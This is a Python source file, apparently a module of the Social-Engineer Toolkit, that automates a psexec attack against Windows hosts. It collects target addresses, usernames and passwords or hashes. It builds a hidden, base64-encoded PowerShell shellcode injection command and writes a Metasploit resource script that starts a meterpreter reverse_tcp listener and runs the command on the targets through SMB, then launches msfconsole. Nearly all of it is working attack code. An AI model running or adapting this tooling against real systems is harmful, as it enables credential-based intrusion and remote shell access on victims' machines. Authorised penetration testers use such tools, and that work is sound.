############################################# # # Main SET module for psexec # ############################################# from src.core.setcore import * # Module options (auxiliary/admin/smb/psexec_command): # Name Current Setting Required Description # ---- --------------- -------- ----------- # COMMAND net group "Domain Admins" /domain yes The command you want to execute on the remote host # RHOSTS yes The target address range or CIDR identifier # RPORT 445 yes The Target port # SMBDomain WORKGROUP no The Windows domain to use for authentication # SMBPass no The password for the specified username # SMBSHARE C$ yes The name of a writeable share on the server # SMBUser no The username to authenticate as # THREADS 1 yes The number of concurrent threads # WINPATH WINDOWS yes The name of the remote Windows directory # msf auxiliary(psexec_command) > # grab config options for stage encoding stage_encoding = check_config("STAGE_ENCODING=").lower() if stage_encoding == "off": stage_encoding = "false" else: stage_encoding = "true" rhosts=raw_input(setprompt(["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts username=raw_input(setprompt(["32"], "Enter the username")) # username for domain/workgroup password=raw_input(setprompt(["32"], "Enter the password or the hash")) # password for domain/workgroup domain=raw_input(setprompt(["32"], "Enter the domain name (hit enter for logon locally)")) # domain name threads=raw_input(setprompt(["32"], "How many threads do you want [enter for default]")) # if blank specify workgroup which is the default if domain == "": domain = "WORKGROUP" # set the threads if threads == "": threads = "15" payload = check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower() # # payload generation for powershell injection # try: # specify ipaddress of reverse listener ipaddr = grab_ipaddress() update_options("IPADDR=" + ipaddr) port = raw_input(setprompt(["29"], "Enter the port for the reverse [443]")) if port == "": port = "443" update_options("PORT=" + port) filewrite = file(setdir + "/payload_options.shellcode", "w") # format needed for shellcode generation filewrite.write(payload + " " + port + ",") filewrite.close() update_options("POWERSHELL_SOLO=ON") print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") try: reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep # create the directory if it does not exist if not os.path.isdir(setdir + "/reports/powershell"): os.makedirs(setdir + "/reports/powershell") x86 = file(setdir + "/x86.powershell", "r") x86 = x86.read() x86 = "powershell -nop -window hidden -noni -enc " + x86 print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir)) filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) filewrite.close() payload = "windows/meterpreter/reverse_tcp\n" # if we are using x86 command = x86 # assign powershell to command # write out our answer file for the powershell injection attack filewrite = file(setdir + "/reports/powershell/powershell.rc", "w") filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" % (port,rhosts,username,password,domain,threads,command, stage_encoding)) filewrite.close() msf_path = meta_path() # launch metasploit below print_status("Launching Metasploit.. This may take a few seconds.") subprocess.Popen("ruby %s/msfconsole -L -n -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait() # handle exceptions except Exception, e: print_error("Something went wrong printing error: " + str(e))